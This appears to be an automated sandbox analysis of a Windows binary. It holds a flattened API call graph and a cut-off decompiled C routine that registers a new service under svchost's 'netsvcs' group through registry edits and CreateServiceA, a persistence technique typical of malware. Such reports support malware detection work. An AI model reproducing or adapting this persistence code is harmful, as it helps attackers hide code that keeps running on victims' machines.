255af1 RegCloseKey 11852->11853 11853->11249 11863 2551b6 ___scrt_fastfail 11854->11863 11855 2558a9 11857 257097 TranslatorGuardHandler 5 API calls 11855->11857 11858 2558c3 11857->11858 11858->11254 11858->11255 11859 254cf0 26 API calls 11859->11863 11860 255110 38 API calls 11860->11863 11861 254e30 27 API calls 11861->11863 11862 257f02 38 API calls 11862->11863 11863->11855 11863->11859 11863->11860 11863->11861 11863->11862 11864 253d30 50 API calls 11863->11864 11870 25560c GetSystemDirectoryA 11863->11870 11871 253d30 50 API calls 11863->11871 11872 2557ed DeleteFileA CreateFileA 11863->11872 11880 254a10 11863->11880 11865 255584 OpenSCManagerA 11864->11865 11865->11863 11866 255599 OpenServiceA 11865->11866 11867 2555af CloseServiceHandle 11866->11867 11868 2555b8 QueryServiceStatusEx CloseServiceHandle CloseServiceHandle 11866->11868 11867->11863 11868->11863 11869 2555e6 11868->11869 11869->11863 11870->11863 11871->11863 11873 255821 11872->11873 11874 25580f CloseHandle 11872->11874 11875 253d30 50 API calls 11873->11875 11874->11863 11876 255839 RegCreateKeyExA 11875->11876 11876->11855 11877 25587f RegSetValueExA 11876->11877 11878 2558c7 RegCloseKey 11877->11878 11879 2558a3 RegCloseKey 11877->11879 11878->11855 11879->11855 11894 254e30 11880->11894 11882 254a5b 11906 257f02 11882->11906 11896 254e3e 11894->11896 11895 254e85 11897 254e8e 11895->11897 11898 254f09 11895->11898 11896->11895 11901 254e62 11896->11901 11903 254e9d 11897->11903 11914 254f20 11897->11914 11920 257ec2 11898->11920 11909 254c10 11901->11909 11903->11882 11905 254e80 11905->11882 11970 25d2a1 11906->11970 11908 257f0f 11910 254c29 11909->11910 11912 254c36 11909->11912 11910->11912 11925 254d50 11910->11925 11912->11905 11913 254c84 11913->11905 11915 254f61 11914->11915 11933 2570a8 11915->11933 11918 254fda 11919 255041 11918->11919 11939 254cf0 11918->11939 11919->11903 11960 257de3 11920->11960 11923 2595bc __CxxThrowException@8 RaiseException 11924 257ee1 11923->11924 11926 254d96 11925->11926 11927 254d5c 11925->11927 11928 257ec2 27 API calls 11926->11928 11930 254f20 27 API calls 11927->11930 11932 254d77 11927->11932 11929 254da0 11928->11929 11931 254d6a 11930->11931 11931->11913 11932->11913 11934 2570ad new 11933->11934 11935 2570d9 11934->11935 11936 25beae new 7 API calls 11934->11936 11944 2575cf 11934->11944 11948 257ea5 11934->11948 11935->11918 11936->11934 11940 254d2c 11939->11940 11943 254cfe 11939->11943 11955 25ba62 11940->11955 11943->11919 11945 2575dd Concurrency::cancel_current_task 11944->11945 11952 2595bc 11945->11952 11947 2575eb 11947->11934 11949 257eb3 Concurrency::cancel_current_task 11948->11949 11950 2595bc __CxxThrowException@8 RaiseException 11949->11950 11951 257ec1 11950->11951 11953 2595dc 11952->11953 11954 25960e RaiseException 11953->11954 11954->11947 11956 25b9d7 __cftof 26 API calls 11955->11956 11957 25ba71 11956->11957 11958 25ba7f __cftof 11 API calls 11957->11958 11959 25ba7e 11958->11959 11963 257d8b 11960->11963 11966 25953a 11963->11966 11965 257db7 11965->11923 11967 259574 ___std_exception_copy 11966->11967 11968 259547 new 11966->11968 11967->11965 11968->11967 11969 25bab2 ___std_exception_copy 26 API calls 11968->11969 11969->11967 11971 25d2c2 11970->11971 11972 25d2ad 11970->11972 11984 25d8ee 11971->11984 11974 25d495 __dosmaperr 20 API calls 11972->11974 11976 25d2b2 11974->11976 11975 25d2cd 11977 25d2e5 11975->11977 11979 25d495 __dosmaperr 20 API calls 11975->11979 11978 25ba52 __cftof 26 API calls 11976->11978 11977->11908 11980 25d2bd 11978->11980 11981 25d2d6 11979->11981 11980->11908 11982 25d495 __dosmaperr 20 API calls 11981->11982 11983 25d2e1 11982->11983 11983->11908 11985 25d4c2 FindHandlerForForeignException 5 API calls 11984->11985 11986 25d915 11985->11986 11987 25d93f 11986->11987 11989 25d91e 11986->11989 11988 25d37c _abort 38 API calls 11987->11988 11990 25d944 11988->11990 11991 257097 TranslatorGuardHandler 5 API calls 11989->11991 11990->11975 11992 25d939 11991->11992 11992->11975 12016 2547a0 CreateFileA 11993->12016 11995 2548a7 11995->11277 11996 2549f6 LocalFree 11996->11277 11997 2570a8 new 8 API calls 11998 2548a0 ___scrt_fastfail 11997->11998 11998->11995 11998->11996 11998->11997 11999 254934 LocalAlloc LocalAlloc 11998->11999 12000 254921 LocalFree 11998->12000 12001 254966 11999->12001 12000->11277 12025 254670 LocalAlloc 12001->12025 12003 254983 12004 254987 LocalAlloc 12003->12004 12007 2549df 12003->12007 12005 2549ad ___scrt_fastfail 12004->12005 12006 2549c1 LocalFree LocalFree 12005->12006 12005->12007 12006->11277 12007->11996 12009 255ce1 ___scrt_fastfail 12008->12009 12010 255d49 LocalFree 12009->12010 12013 255d68 12009->12013 12011 257097 TranslatorGuardHandler 5 API calls 12010->12011 12012 255d5f 12011->12012 12012->11280 12014 257097 TranslatorGuardHandler 5 API calls 12013->12014 12015 255d8e 12014->12015 12015->11280 12017 2547d1 GetFileSizeEx LocalAlloc 12016->12017 12018 2547ca 12016->12018 12019 254803 CloseHandle 12017->12019 12020 254812 12017->12020 12018->11998 12019->11998 12021 254822 ReadFile 12020->12021 12022 25484b 12020->12022 12021->12020 12021->12022 12023 254854 CloseHandle LocalFree 12022->12023 12024 25486d FindCloseChangeNotification 12022->12024 12023->11998 12024->11998 12026 2546bf 12025->12026 12029 2546e0 CryptAcquireContextA 12026->12029 12028 2546cc LocalFree 12028->12003 12030 254705 CryptImportKey 12029->12030 12031 2546ff 12029->12031 12030->12031 12032 254724 CryptCreateHash 12030->12032 12031->12028 12032->12031 12033 25473e CryptHashData 12032->12033 12033->12031 12034 254753 CryptVerifySignatureA 12033->12034 12035 254787 12034->12035 12036 254780 CryptDestroyHash 12034->12036 12037 254797 12035->12037 12038 25478e CryptReleaseContext 12035->12038 12036->12035 12037->12028 12038->12037 12040 256ede RegQueryValueExA RegCloseKey SetLastError 12039->12040 12052 257012 12039->12052 12042 256f2c OpenSCManagerA 12040->12042 12040->12052 12041 25701f CloseServiceHandle CloseServiceHandle 12044 257097 TranslatorGuardHandler 5 API calls 12041->12044 12043 256f43 12042->12043 12042->12052 12053 256cf0 12043->12053 12046 25703a OpenSCManagerA 12044->12046 12046->11298 12046->11299 12047 256f4a wsprintfA CreateServiceA 12047->12041 12048 256f98 wsprintfA lstrlenA 12047->12048 12089 256be0 RegCreateKeyExA 12048->12089 12052->12041 12054 2596c0 ___scrt_fastfail 12053->12054 12055 256d19 RegOpenKeyExA 12054->12055 12056 256d4f RegQueryValueExA SetLastError 12055->12056 12057 256d3e 12055->12057 12059 256dad lstrlenA 12056->12059 12060 256d8f RegCloseKey 12056->12060 12058 257097 TranslatorGuardHandler 5 API calls 12057->12058 12062 256d4b 12058->12062 12065 256dd5 lstrlenA 12059->12065 12066 256e6e 12059->12066 12061 257097 TranslatorGuardHandler 5 API calls 12060->12061 12063 256da9 12061->12063 12062->12047 12063->12047 12099 267820 12065->12099 12102 257211 12066->12102 12090 256c3f RegOpenKeyExA 12089->12090 12097 256c79 12089->12097 12090->12097 12110 256ce1 RegCloseKey RegCloseKey 12097->12110 12100 256dfb lstrlenA RegSetValueExA RegCloseKey SetLastError lstrlenA 12099->12100 12101 2572ed 12100->12101 12105 25721d IsProcessorFeaturePresent 12102->12105 12106 257231 12105->12106 12109 2570ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12106->12109 12114 26131a 12111->12114 12117 261333 12114->12117 12115 257097 TranslatorGuardHandler 5 API calls 12116 257823 12115->12116 12116->10601 12117->12115 12780 26128e 12781 2612b4 12780->12781 12784 2612b0 12780->12784 12781->12784 12785 25de00 31 API calls 12781->12785 12786 25dd4a 2 API calls 12781->12786 12782 257097 TranslatorGuardHandler 5 API calls 12783 261316 12782->12783 12784->12782 12785->12781 12786->12781 10441 257399 10446 257aae SetUnhandledExceptionFilter 10441->10446 10443 25739e 10447 25cbb5 10443->10447 10445 2573a9 10446->10443 10448 25cbc1 10447->10448 10449 25cbdb 10447->10449 10448->10449 10450 25d495 __dosmaperr 20 API calls 10448->10450 10449->10445 10451 25cbcb 10450->10451 10454 25ba52 10451->10454 10457 25b9d7 10454->10457 10456 25ba5e 10456->10445 10458 25e9ea __dosmaperr 20 API calls 10457->10458 10459 25b9ed 10458->10459 10460 25ba4c 10459->10460 10461 25b9fb 10459->10461 10468 25ba7f IsProcessorFeaturePresent 10460->10468 10465 257097 TranslatorGuardHandler 5 API calls 10461->10465 10463 25ba51 10464 25b9d7 __cftof 26 API calls 10463->10464 10466 25ba5e 10464->10466 10467 25ba22 10465->10467 10466->10456 10467->10456 10469 25ba8a 10468->10469 10472 25b888 10469->10472 10473 25b8a4 _abort ___scrt_fastfail 10472->10473 10474 25b8d0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10473->10474 10475 25b9a1 _abort 10474->10475 10476 257097 TranslatorGuardHandler 5 API calls 10475->10476 10477 25b9bf GetCurrentProcess TerminateProcess 10476->10477 10477->10463 12823 25a4ef 12833 25db75 12823->12833 12827 25a4fc 12846 25dc56 12827->12846 12830 25a526 12831 25d2f4 _free 20 API calls 12830->12831 12832 25a531 12831->12832 12850 25db7e 12833->12850 12835 25a4f7 12836 25da28 12835->12836 12837 25da34 ___DestructExceptionObject 12836->12837 12870 25f698 EnterCriticalSection 12837->12870 12839 25da3f 12840 25daaa 12839->12840 12842 25da7e DeleteCriticalSection 12839->12842 12871 261d69 12839->12871 12884 25dabf 12840->12884 12844 25d2f4 _free 20 API calls 12842->12844 12844->12839 12845 25dab6 ___DestructExceptionObject 12845->12827 12847 25a50b DeleteCriticalSection 12846->12847 12848 25dc6c 12846->12848 12847->12827 12847->12830 12848->12847 12849 25d2f4 _free 20 API calls 12848->12849 12849->12847 12851 25db8a ___DestructExceptionObject 12850->12851 12860 25f698 EnterCriticalSection 12851->12860 12853 25dc2d 12865 25dc4d 12853->12865 12855 25db99 12855->12853 12859 25db2e 66 API calls 12855->12859 12861 25a53b EnterCriticalSection 12855->12861 12862 25dc23 12855->12862 12857 25dc39 ___DestructExceptionObject 12857->12835 12859->12855 12860->12855 12861->12855 12868 25a54f LeaveCriticalSection 12862->12868 12864 25dc2b 12864->12855 12869 25f6e0 LeaveCriticalSection 12865->12869 12867 25dc54 12867->12857 12868->12864 12869->12867 12870->12839 12872 261d75 ___DestructExceptionObject 12871->12872 12873 261d86 12872->12873 12875 261d9b 12872->12875 12874 25d495 __dosmaperr 20 API calls 12873->12874 12876 261d8b 12874->12876 12883 261d96 ___DestructExceptionObject 12875->12883 12887 25a53b EnterCriticalSection 12875->12887 12878 25ba52 __cftof 26 API calls 12876->12878 12878->12883 12879 261db7 12888 261cf3 12879->12888 12881 261dc2 12904 261ddf 12881->12904 12883->12839 13152 25f6e0 LeaveCriticalSection 12884->13152 12886 25dac6 12886->12845 12887->12879 12889 261d15 12888->12889 12890 261d00 12888->12890 12895 261d10 12889->12895 12907 25dac8 12889->12907 12891 25d495 __dosmaperr 20 API calls 12890->12891 12892 261d05 12891->12892 12894 25ba52 __cftof 26 API calls 12892->12894 12894->12895 12895->12881 12897 25dc56 20 API calls 12898 261d31 12897->12898 12913 25f524 12898->12913 12900 261d37 12920 264d5e 12900->12920 12903 25d2f4 _free 20 API calls 12903->12895 13151 25a54f LeaveCriticalSection 12904->13151 12906 261de7 12906->12883 12908 25dae0 12907->12908 12912 25dadc 12907->12912 12909 25f524 26 API calls 12908->12909 12908->12912 12910 25db00 12909->12910 12935 2624a8 12910->12935 12912->12897 12914 25f545 12913->12914 12915 25f530 12913->12915 12914->12900 12916 25d495 __dosmaperr 20 API calls 12915->12916 12917 25f535 12916->12917 12918 25ba52 __cftof 26 API calls 12917->12918 12919 25f540 12918->12919 12919->12900 12921 264d6d 12920->12921 12924 264d82 12920->12924 12923 25d482 __dosmaperr 20 API calls 12921->12923 12922 264dbd 12925 25d482 __dosmaperr 20 API calls 12922->12925 12926 264d72 12923->12926 12924->12922 12928 264da9 12924->12928 12929 264dc2 12925->12929 12927 25d495 __dosmaperr 20 API calls 12926->12927 12932 261d3d 12927->12932 13108 264d36 12928->13108 12931 25d495 __dosmaperr 20 API calls 12929->12931 12933 264dca 12931->12933 12932->12895 12932->12903 12934 25ba52 __cftof 26 API calls 12933->12934 12934->12932 12936 2624b4 ___DestructExceptionObject 12935->12936 12937 2624d4 12936->12937 12938 2624bc 12936->12938 12940 262572 12937->12940 12945 262509 12937->12945 12960 25d482 12938->12960 12942 25d482 __dosmaperr 20 API calls 12940->12942 12944 262577 12942->12944 12943 25d495 __dosmaperr 20 API calls 12954 2624c9 ___DestructExceptionObject 12943->12954 12946 25d495 __dosmaperr 20 API calls 12944->12946 12963 26096e EnterCriticalSection 12945->12963 12948 26257f 12946->12948 12950 25ba52 __cftof 26 API calls 12948->12950 12949 26250f 12951 262540 12949->12951 12952 26252b 12949->12952 12950->12954 12964 262593 12951->12964 12953 25d495 __dosmaperr 20 API calls 12952->12953 12956 262530 12953->12956 12954->12912 12958 25d482 __dosmaperr 20 API calls 12956->12958 12957 26253b 13015 26256a 12957->13015 12958->12957 12961 25e9ea __dosmaperr 20 API calls 12960->12961 12962 25d487 12961->12962 12962->12943 12963->12949 12965 2625c1 12964->12965 13000 2625ba 12964->13000 12966 2625e4 12965->12966 12967 2625c5 12965->12967 12970 262635 12966->12970 12971 262618 12966->12971 12969 25d482 __dosmaperr 20 API calls 12967->12969 12968 257097 TranslatorGuardHandler 5 API calls 12972 26279b 12968->12972 12973 2625ca 12969->12973 12974 26264b 12970->12974 13018 264f32 12970->13018 12976 25d482 __dosmaperr 20 API calls 12971->12976 12972->12957 12975 25d495 __dosmaperr 20 API calls 12973->12975 13021 262138 12974->13021 12978 2625d1 12975->12978 12980 26261d 12976->12980 12981 25ba52 __cftof 26 API calls 12978->12981 12983 25d495 __dosmaperr 20 API calls 12980->12983 12981->13000 12986 262625 12983->12986 12984 262692 12987 2626a6 12984->12987 12988 2626ec WriteFile 12984->12988 12985 262659 12989 26267f 12985->12989 12990 26265d 12985->12990 12991 25ba52 __cftof 26 API calls 12986->12991 12992 2626ae 12987->12992 12993 2626dc 12987->12993 12994 26270f GetLastError 12988->12994 13003 262675 12988->13003 13033 261f18 GetConsoleCP 12989->13033 13005 262753 12990->13005 13028 2620cb 12990->13028 12991->13000 12996 2626b3 12992->12996 12997 2626cc 12992->12997 13059 2621ae 12993->13059 12994->13003 12996->13005 13044 26228d 12996->13044 13051 26237b 12997->13051 13000->12968 13002 25d495 __dosmaperr 20 API calls 13004 262778 13002->13004 13003->13000 13003->13005 13006 26272f 13003->13006 13008 25d482 __dosmaperr 20 API calls 13004->13008 13005->13000 13005->13002 13009 262736 13006->13009 13010 26274a 13006->13010 13008->13000 13011 25d495 __dosmaperr 20 API calls 13009->13011 13066 25d45f 13010->13066 13013 26273b 13011->13013 13014 25d482 __dosmaperr 20 API calls 13013->13014 13014->13000 13107 260991 LeaveCriticalSection 13015->13107 13017 262570 13017->12954 13071 264eb4 13018->13071 13093 26437a 13021->13093 13023 262148 13024 26214d 13023->13024 13025 25e966 FindHandlerForForeignException 38 API calls 13023->13025 13024->12984 13024->12985 13026 262170 13025->13026 13026->13024 13027 26218e GetConsoleMode 13026->13027 13027->13024 13031 262125 13028->13031 13032 2620f0 13028->13032 13029 262127 GetLastError 13029->13031 13030 264f4d WriteConsoleW CreateFileW 13030->13032 13031->13003 13032->13029 13032->13030 13032->13031 13035 261f7b 13033->13035 13039 26208d 13033->13039 13034 257097 TranslatorGuardHandler 5 API calls 13037 2620c7 13034->13037 13038 25e1be 40 API calls __fassign 13035->13038 13035->13039 13040 262001 WideCharToMultiByte 13035->13040 13043 262058 WriteFile 13035->13043 13102 25f55f 13035->13102 13037->13003 13038->13035 13039->13034 13040->13039 13041 262027 WriteFile 13040->13041 13041->13035 13042 2620b0 GetLastError 13041->13042 13042->13039 13043->13035 13043->13042 13045 26229c 13044->13045 13046 26235e 13045->13046 13048 26231a WriteFile 13045->13048 13047 257097 TranslatorGuardHandler 5 API calls 13046->13047 13050 262377 13047->13050 13048->13045 13049 262360 GetLastError 13048->13049 13049->13046 13050->13003 13056 26238a 13051->13056 13052 262495 13053 257097 TranslatorGuardHandler 5 API calls 13052->13053 13054 2624a4 13053->13054 13054->13003 13055 26240c WideCharToMultiByte 13057 262441 WriteFile 13055->13057 13058 26248d GetLastError 13055->13058 13056->13052 13056->13055 13056->13057 13057->13056 13057->13058 13058->13052 13060 2621bd 13059->13060 13061 262270 13060->13061 13063 26222f WriteFile 13060->13063 13062 257097 TranslatorGuardHandler 5 API calls 13061->13062 13064 262289 13062->13064 13063->13060 13065 262272 GetLastError 13063->13065 13064->13003 13065->13061 13067 25d482 __dosmaperr 20 API calls 13066->13067 13068 25d46a __dosmaperr 13067->13068 13069 25d495 __dosmaperr 20 API calls 13068->13069 13070 25d47d 13069->13070 13070->13000 13080 260a45 13071->13080 13073 264ec6 13074 264ece 13073->13074 13075 264edf SetFilePointerEx 13073->13075 13076 25d495 __dosmaperr 20 API calls 13074->13076 13077 264ef7 GetLastError 13075->13077 13078 264ed3 13075->13078 13076->13078 13079 25d45f __dosmaperr 20 API calls 13077->13079 13078->12974 13079->13078 13081 260a52 13080->13081 13083 260a67 13080->13083 13082 25d482 __dosmaperr 20 API calls 13081->13082 13084 260a57 13082->13084 13085 25d482 __dosmaperr 20 API calls 13083->13085 13087 260a8c 13083->13087 13086 25d495 __dosmaperr 20 API calls 13084->13086 13088 260a97 13085->13088 13089 260a5f 13086->13089 13087->13073 13090 25d495 __dosmaperr 20 API calls 13088->13090 13089->13073 13091 260a9f 13090->13091 13092 25ba52 __cftof 26 API calls 13091->13092 13092->13089 13094 264387 13093->13094 13095 264394 13093->13095 13096 25d495 __dosmaperr 20 API calls 13094->13096 13097 2643a0 13095->13097 13098 25d495 __dosmaperr 20 API calls 13095->13098 13099 26438c 13096->13099 13097->13023 13100 2643c1 13098->13100 13099->13023 13101 25ba52 __cftof 26 API calls 13100->13101 13101->13099 13103 25e966 FindHandlerForForeignException 38 API calls 13102->13103 13104 25f56a 13103->13104 13105 25eab5 __cftof 38 API calls 13104->13105 13106 25f57a 13105->13106 13106->13035 13107->13017 13111 264cb4 13108->13111 13110 264d5a 13110->12932 13112 264cc0 ___DestructExceptionObject 13111->13112 13122 26096e EnterCriticalSection 13112->13122 13114 264cce 13115 264cf5 13114->13115 13116 264d00 13114->13116 13123 264ddd 13115->13123 13118 25d495 __dosmaperr 20 API calls 13116->13118 13119 264cfb 13118->13119 13138 264d2a 13119->13138 13121 264d1d ___DestructExceptionObject 13121->13110 13122->13114 13124 260a45 26 API calls 13123->13124 13125 264ded 13124->13125 13126 264df3 13125->13126 13127 264e25 13125->13127 13129 260a45 26 API calls 13125->13129 13141 2609b4 13126->13141 13127->13126 13130 260a45 26 API calls 13127->13130 13133 264e1c 13129->13133 13134 264e31 CloseHandle 13130->13134 13132 264e6d 13132->13119 13136 260a45 26 API calls 13133->13136 13134->13126 13137 264e3d GetLastError 13134->13137 13135 25d45f __dosmaperr 20 API calls 13135->13132 13136->13127 13137->13126 13150 260991 LeaveCriticalSection 13138->13150 13140 264d34 13140->13121 13142 2609c3 13141->13142 13143 260a2a 13141->13143 13142->13143 13149 2609ed 13142->13149 13144 25d495 __dosmaperr 20 API calls 13143->13144 13145 260a2f 13144->13145 13146 25d482 __dosmaperr 20 API calls 13145->13146 13147 260a1a 13146->13147 13147->13132 13147->13135 13148 260a14 SetStdHandle 13148->13147 13149->13147 13149->13148 13150->13140 13151->12906 13152->12886 13159 2572f6 13160 2572fe 13159->13160 13177 25ca8e 13160->13177 13162 257309 13184 2576c8 13162->13184 13164 257389 13165 257993 ___scrt_fastfail 4 API calls 13164->13165 13167 257390 ___scrt_initialize_default_local_stdio_options 13165->13167 13166 25731e __RTC_Initialize 13166->13164 13189 25786c 13166->13189 13169 257337 13169->13164 13170 257348 13169->13170 13192 25792a InitializeSListHead 13170->13192 13172 25734d ___InternalCxxFrameHandler 13193 257936 13172->13193 13174 257370 13199 25cb4d 13174->13199 13176 25737b 13178 25cac0 13177->13178 13179 25ca9d 13177->13179 13178->13162 13179->13178 13180 25d495 __dosmaperr 20 API calls 13179->13180 13181 25cab0 13180->13181 13182 25ba52 __cftof 26 API calls 13181->13182 13183 25cabb 13182->13183 13183->13162 13185 2576d6 13184->13185 13188 2576db ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 13184->13188 13186 257993 ___scrt_fastfail 4 API calls 13185->13186 13185->13188 13187 25775e 13186->13187 13188->13166 13206 257831 13189->13206 13192->13172 13272 25d0e9 13193->13272 13195 257947 13196 25794e 13195->13196 13197 257993 ___scrt_fastfail 4 API calls 13195->13197 13196->13174 13198 257956 13197->13198 13200 25e966 FindHandlerForForeignException 38 API calls 13199->13200 13202 25cb58 13200->13202 13201 25cb90 13201->13176 13202->13201 13203 25d495 __dosmaperr 20 API calls 13202->13203 13204 25cb85 13203->13204 13205 25ba52 __cftof 26 API calls 13204->13205 13205->13201 13207 257855 13206->13207 13208 25784e 13206->13208 13215 25cfad 13207->13215 13212 25cf3d 13208->13212 13211 257853 13211->13169 13213 25cfad __onexit 29 API calls 13212->13213 13214 25cf4f 13213->13214 13214->13211 13218 25ccb4 13215->13218 13221 25cbea 13218->13221 13220 25ccd8 13220->13211 13222 25cbf6 ___DestructExceptionObject 13221->13222 13229 25f698 EnterCriticalSection 13222->13229 13224 25cc04 13230 25cdfc 13224->13230 13226 25cc11 13240 25cc2f 13226->13240 13228 25cc22 ___DestructExceptionObject 13228->13220 13229->13224 13231 25ce1a 13230->13231 13238 25ce12 __onexit __crt_fast_encode_pointer 13230->13238 13232 25ce73 13231->13232 13231->13238 13243 261204 13231->13243 13234 261204 __onexit 29 API calls 13232->13234 13232->13238 13236 25ce89 13234->13236 13235 25ce69 13237 25d2f4 _free 20 API calls 13235->13237 13239 25d2f4 _free 20 API calls 13236->13239 13237->13232 13238->13226 13239->13238 13271 25f6e0 LeaveCriticalSection 13240->13271 13242 25cc39 13242->13228 13244 26120f 13243->13244 13245 261237 13244->13245 13246 261228 13244->13246 13247 261246 13245->13247 13252 264af6 13245->13252 13248 25d495 __dosmaperr 20 API calls 13246->13248 13259 264b29 13247->13259 13251 26122d ___scrt_fastfail 13248->13251 13251->13235 13253 264b16 HeapSize 13252->13253 13254 264b01 13252->13254 13253->13247 13255 25d495 __dosmaperr 20 API calls 13254->13255 13256 264b06 13255->13256 13257 25ba52 __cftof 26 API calls 13256->13257 13258 264b11 13257->13258 13258->13247 13260 264b36 13259->13260 13261 264b41 13259->13261 13263 25d32e __onexit 21 API calls 13260->13263 13262 264b49 13261->13262 13269 264b52 FindHandlerForForeignException 13261->13269 13264 25d2f4 _free 20 API calls 13262->13264 13267 264b3e 13263->13267 13264->13267 13265 264b57 13268 25d495 __dosmaperr 20 API calls 13265->13268 13266 264b7c HeapReAlloc 13266->13267 13266->13269 13267->13251 13268->13267 13269->13265 13269->13266 13270 25beae new 7 API calls 13269->13270 13270->13269 13271->13242 13274 25d107 13272->13274 13277 25d127 13272->13277 13273 25d495 __dosmaperr 20 API calls 13275 25d11d 13273->13275 13274->13273 13276 25ba52 __cftof 26 API calls 13275->13276 13276->13277 13277->13195 13317 25cafb 13318 25cb07 ___DestructExceptionObject 13317->13318 13319 25cb3e ___DestructExceptionObject 13318->13319 13325 25f698 EnterCriticalSection 13318->13325 13321 25cb1b 13322 2611b4 __cftof 20 API calls 13321->13322 13323 25cb2b 13322->13323 13326 25cb44 13323->13326 13325->13321 13329 25f6e0 LeaveCriticalSection 13326->13329 13328 25cb4b 13328->13319 13329->13328 12643 25e851 12644 25e85c 12643->12644 12645 25e86c 12643->12645 12649 25e872 12644->12649 12648 25d2f4 _free 20 API calls 12648->12645 12650 25e885 12649->12650 12651 25e88b 12649->12651 12652 25d2f4 _free 20 API calls 12650->12652 12653 25d2f4 _free 20 API calls 12651->12653 12652->12651 12654 25e897 12653->12654 12655 25d2f4 _free 20 API calls 12654->12655 12656 25e8a2 12655->12656 12657 25d2f4 _free 20 API calls 12656->12657 12658 25e8ad 12657->12658 12659 25d2f4 _free 20 API calls 12658->12659 12660 25e8b8 12659->12660 12661 25d2f4 _free 20 API calls 12660->12661 12662 25e8c3 12661->12662 12663 25d2f4 _free 20 API calls 12662->12663 12664 25e8ce 12663->12664 12665 25d2f4 _free 20 API calls 12664->12665 12666 25e8d9 12665->12666 12667 25d2f4 _free 20 API calls 12666->12667 12668 25e8e4 12667->12668 12669 25d2f4 _free 20 API calls 12668->12669 12670 25e8f2 12669->12670 12675 25e738 12670->12675 12681 25e644 12675->12681 12677 25e75c 12678 25e788 12677->12678 12694 25e6a5 12678->12694 12680 25e7ac 12680->12648 12682 25e650 ___DestructExceptionObject 12681->12682 12689 25f698 EnterCriticalSection 12682->12689 12685 25e65a 12687 25d2f4 _free 20 API calls 12685->12687 12688 25e684 12685->12688 12686 25e691 ___DestructExceptionObject 12686->12677 12687->12688 12690 25e699 12688->12690 12689->12685 12693 25f6e0 LeaveCriticalSection 12690->12693 12692 25e6a3 12692->12686 12693->12692 12695 25e6b1 ___DestructExceptionObject 12694->12695 12702 25f698 EnterCriticalSection 12695->12702 12697 25e6bb 12698 25e91b FindHandlerForForeignException 20 API calls 12697->12698 12699 25e6ce 12698->12699 12703 25e6e4 12699->12703 12701 25e6dc ___DestructExceptionObject 12701->12680 12702->12697 12706 25f6e0 LeaveCriticalSection 12703->12706 12705 25e6ee 12705->12701 12706->12705

                                                Executed Functions

                                                Function 00256CF0 Relevance: 59.8, APIs: 25, Strings: 9, Instructions: 265registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 67%
                                                			E00256CF0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
				signed int _v8;
				signed int _v12;
				char _v60;
				char _v1036;
				char _v2060;
				void* _v2064;
				char* _v2068;
				CHAR* _v2072;
				CHAR* _v2076;
				int _v2080;
				int _v2084;
				char _v2108;
				void* _v2112;
				int _v2116;
				int _v2120;
				intOrPtr _v2124;
				signed int _v2136;
				void* _v4188;
				intOrPtr _v4192;
				int _v4196;
				intOrPtr _v4200;
				void* __esi;
				signed int _t60;
				long _t65;
				long _t69;
				char _t70;
				void* _t73;
				signed int _t75;
				signed int _t80;
				void* _t81;
				char* _t89;
				long _t114;
				char* _t130;
				char* _t134;
				char* _t137;
				intOrPtr _t146;
				void* _t149;
				long _t150;
				void* _t152;
				intOrPtr* _t157;
				void* _t159;
				char* _t160;
				void* _t165;
				void* _t166;
				void* _t167;
				signed int _t168;
				signed int _t169;
				void* _t170;
				signed int _t171;

				_t149 = __edi;
				_t146 = __edx;
				_t60 =  *0x271004; // 0x80aab37c
				_v8 = _t60 ^ _t168;
				_t157 = __ecx;
				E002596C0(__edi,  &_v2108, 0, 0x800);
				_t171 = _t170 + 0xc;
				_t65 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0xf003f,  &_v2112); // executed
				if(_t65 == 0) {
					_push(_t149);
					_v2116 = 0x800;
					_t69 = RegQueryValueExA(_v2112, "netsvcs", 0,  &_v2120,  &_v2108,  &_v2116); // executed
					_t150 = _t69;
					SetLastError(_t150);
					__eflags = _t150;
					if(_t150 == 0) {
						_t134 =  &_v60 - _t157;
						__eflags = _t134;
						do {
							_t70 =  *_t157;
							_t157 = _t157 + 1;
							_t134[_t157 - 1] = _t70;
							__eflags = _t70;
						} while (_t70 != 0);
						_t73 = lstrlenA( &_v60) + 1;
						__eflags = _t73 - 0x32;
						if(_t73 >= 0x32) {
							E00257211();
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t168);
							_t169 = _t171;
							_t75 =  *0x271004; // 0x80aab37c
							_v2136 = _t75 ^ _t169;
							_push(_t157);
							_push(lstrlenA);
							_v4192 = _v2124;
							_t152 = 0;
							_t130 = _t134;
							_v4196 = _v2120;
							_v4200 = _t146;
							_v4188 = 0x80000002;
							_t80 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 1,  &_v4188); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								L14:
								_t81 = 0;
								__eflags = 0;
							} else {
								_v2080 = 0x400;
								_t89 = RegQueryValueExA(_v2064, "netsvcs", 0,  &_v2084,  &_v1036,  &_v2080); // executed
								_t160 = _t89; // executed
								RegCloseKey(_v2064); // executed
								SetLastError(_t160);
								__eflags = _t160;
								if(_t160 != 0) {
									goto L14;
								} else {
									_t152 = OpenSCManagerA(_t160, _t160, 0xf003f);
									__eflags = _t152;
									if(_t152 == 0) {
										goto L14;
									} else {
										_t137 = _t130; // executed
										E00256CF0(_t130, _t137, _t146, _t152); // executed
										wsprintfA( &_v2060, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", _t130);
										_t81 = CreateServiceA(_t152, _t130, _v2068, 0xf01ff, 0x10, 2, 1, "%SystemRoot%\\System32\\svchost.exe -k netsvcs", 0, 0, 0, 0, 0);
										_v2068 = _t81;
										__eflags = _t81;
										if(_t81 != 0) {
											_v2064 = 0x80000002;
											wsprintfA( &_v1036, "SYSTEM\\CurrentControlSet\\Services\\%s", _t130);
											E00256BE0( &_v1036, "Description", 1, _v2072, lstrlenA(_v2072)); // executed
											lstrcatA( &_v1036, "\\Parameters");
											_push(_t137);
